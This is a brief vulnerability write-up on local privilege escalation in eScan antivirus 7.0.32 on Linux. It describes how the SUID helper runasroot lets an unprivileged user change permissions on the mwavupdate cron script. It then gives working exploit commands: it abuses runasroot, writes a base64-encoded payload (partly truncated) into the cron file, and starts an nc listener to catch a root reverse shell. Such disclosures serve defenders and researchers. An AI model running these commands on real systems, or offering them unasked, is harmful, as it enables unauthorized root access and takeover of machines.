Priv Esc in eScan antivirus 7.0.32


  • This software has a file mwavupdate which is a crontab script. It creates a symlink to /etc/cron.d to make system run update using cronjob
  • runasroot is a SUID binary file that allows unprivileged user change permission of some certain files using chmod. The mwavupdate is in the list too
    → Attacker can change permission of mwavupdate, overwriting the crontab by a malicious task to execute system command as root

Exploit demo that gains reverse shell (localhost)

# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888

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